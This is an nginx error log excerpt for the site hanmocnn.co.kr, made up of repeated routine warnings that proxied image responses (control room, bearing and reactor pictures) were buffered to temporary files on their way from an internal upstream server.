2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000010989 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000010990 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000010991 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:28:31 [warn] 898#898: *40194 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000010992 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:28:31 [warn] 898#898: *40194 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000010993 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:28:32 [warn] 898#898: *40194 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/99/0000010994 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:30:16 [warn] 898#898: *40209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/99/0000010995 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:30:16 [warn] 898#898: *40209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/99/0000010996 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:30:16 [warn] 898#898: *40209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/99/0000010997 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:41:23 [warn] 898#898: *40229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/99/0000010998 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:41:23 [warn] 898#898: *40229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000010999 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/00/0000011000 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000011001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000011002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:52:23 [warn] 898#898: *40244 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000011003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:54:48 [warn] 898#898: *40259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000011004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:54:48 [warn] 898#898: *40259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000011005 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:58:25 [warn] 898#898: *40275 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000011006 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:58:25 [warn] 898#898: *40275 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000011007 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:58:25 [warn] 898#898: *40275 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000011008 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:09:27 [warn] 898#898: *40291 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/00/0000011009 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:09:27 [warn] 898#898: *40291 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/01/0000011010 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:09:27 [warn] 898#898: *40291 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/01/0000011011 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/01/0000011012 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/01/0000011013 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/01/0000011014 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:26:29 [warn] 897#897: *40362 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/01/0000011015 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:31:20 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/01/0000011016 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:31:20 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/01/0000011017 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:31:21 [warn] 897#897: *40386 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/01/0000011018 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/02/0000011028 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/02/0000011029 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/03/0000011030 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:43:36 [warn] 900#900: *40451 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/03/0000011031 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:45:25 [warn] 900#900: *40468 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/03/0000011032 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:45:25 [warn] 900#900: *40468 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/03/0000011033 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:57:08 [warn] 901#901: *40550 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/03/0000011034 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/03/0000011035 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/03/0000011036 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 02:58:01 [warn] 901#901: *40565 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/03/0000011037 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:03:45 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/03/0000011038 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:03:45 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/03/0000011039 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:03:46 [warn] 901#901: *40594 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/04/0000011040 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/04/0000011041 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/04/0000011042 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/04/0000011043 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:15:43 [warn] 901#901: *40654 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/04/0000011044 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:15:43 [warn] 901#901: *40654 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/04/0000011045 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:19:50 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/04/0000011046 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/04/0000011047 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/04/0000011048 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/04/0000011049 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000011050 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000011051 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000011052 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:47:29 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000011053 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:47:29 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000011054 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:47:51 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000011055 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000011056 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000011057 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000011058 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000011059 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000011060 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000011061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/54/0000012548 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/54/0000012549 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/55/0000012550 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/06/0000014068 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/06/0000014069 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/07/0000014070 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 21:56:56 [warn] 932#932: *92717 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/93/0000015936 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
